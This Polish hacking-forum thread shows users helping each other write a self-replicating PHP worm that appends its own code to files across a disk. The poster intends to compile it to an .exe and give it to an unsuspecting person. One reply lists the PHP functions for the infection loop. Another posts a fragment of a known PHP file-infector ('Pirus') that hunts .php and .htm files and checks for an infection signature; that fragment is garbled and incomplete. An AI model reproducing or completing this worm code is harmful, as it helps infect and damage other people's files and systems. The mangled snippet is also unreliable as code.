Pokaż wyniki 1 do 9 z 9

Temat: php worm

  1. #1
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie php worm

    szukalem ale nie moglem znalezc nic ciekawego:

    czego uzyc, zeby worm 'chodzil' po roznych katalogach na dysku i dopisywal swoj calutki kod, do losowo znalezionych plikow?(chodzi o dopisywanie do konca pliku, czyli 'a' w funkcji fopen)

    // a no i nie chodzi o webmastering, tylko skompilowany program
    War, war never changes.

  2. #2
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    opendir(), readdir(), fopen(a), fwrite(), fclose(), jakas petelka albo dwie i skrypt gotowy.
    http://gogulas.yoyo.pl/h.gif

  3. #3
    Avatar VLN
    VLN
    VLN jest offline Banned
    Zarejestrowany
    Jan 2008
    Postów
    277

    Domyślnie

    A w sumie to fajna sprawa . I na Windowsa i na Linuksa . Heh ja mam kod
    Pirusa : dam kawałek
    Kod php:
    ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[PIRUS.PHP]ÄÄÄ
    <?php
    $handle
    =opendir('.');
    while (
    $file readdir($handle))
    $infected=true;
      
    $executable=false;

     if ( (
    $executable strstr ($file'.php')) || ($executable strstr ($file'.htm')) || ($executable strstr ($file'.php')) )
     if ( 
    is_file($file) && is_writeable($file) )
     {
       
    $host fopen($file"r");
       
    $contents fread ($hostfilesize ($file));
       
    $sig strstr ($contents'pirus.php');
       if(!
    $sig$infected=false;
     }

    PS. Chyba wszyscy znają moje dziwne hobby



    Pozdrawiam VLN.
    Kod php:
    $zmienna $_POST['COS']; 
    Zamiast tego :
    Kod php:
    $zmienna htmlspecialchars($_POST['COS']); 
    I mamy zabezpieczenie przed XSS

  4. #4
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    jak narazie, pomoc forumowa jest znacznie lepsza niz myslalem
    War, war never changes.

  5. #5
    h3x
    h3x jest offline Banned
    Zarejestrowany
    Dec 2007
    Postów
    271

    Domyślnie

    strstr nie koniecznie sprawdza ciag 'od konca'.

    worm w php... nieno, coraz lepiej.

  6. #6
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    nie no php sie wogole nie nadaje do takich rzeczy po dziala po stronie serwera...co z tego ze napiszesz super wyrypistego worma i co z tego.......napiszesz gosciowi zeby sciagnął webserva zainstalował go i uruchomił skrypta.....bez sensu troche ;/

  7. #7
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    lol? kompilujesz do formatu *.exe i dajesz gosciowi w prezencie
    War, war never changes.

  8. #8
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    ok więc sory, przyznam że nie wiedziałem że tak można, myslalem ze trzeba miec jakis interpreter czy cuś.
    na marginesie jeśli ktos bedzie chcial kompilować php do exe polecam program
    http://www.bambalam.se/bamcompile/

  9. #9
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    bamcompile - wlasnie jego uzywam
    prosty, mozliwosc dodawania dll'kow


    no i juz mam glowny szkielet worma, teraz trza wymyslic jak zrobic funkcje poruszania sie po losowych katalogach
    War, war never changes.

Podobne wątki

  1. [php]humory przegladarki? php? systemu?
    By gogulas in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 1
    Autor: 03-27-2008, 08:46
  2. o as i php
    By maxhack in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 4
    Autor: 10-17-2007, 16:06
  3. Intrusion.Win.MSSQL.worm.Helkern
    By Sardihan in forum Wirusy/Konie trojańskie
    Odpowiedzi: 1
    Autor: 07-10-2007, 12:14
  4. PhP
    By Michal_sh in forum Hacking
    Odpowiedzi: 8
    Autor: 04-12-2007, 14:38
  5. php
    By ble34 in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 8
    Autor: 03-08-2007, 22:36

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52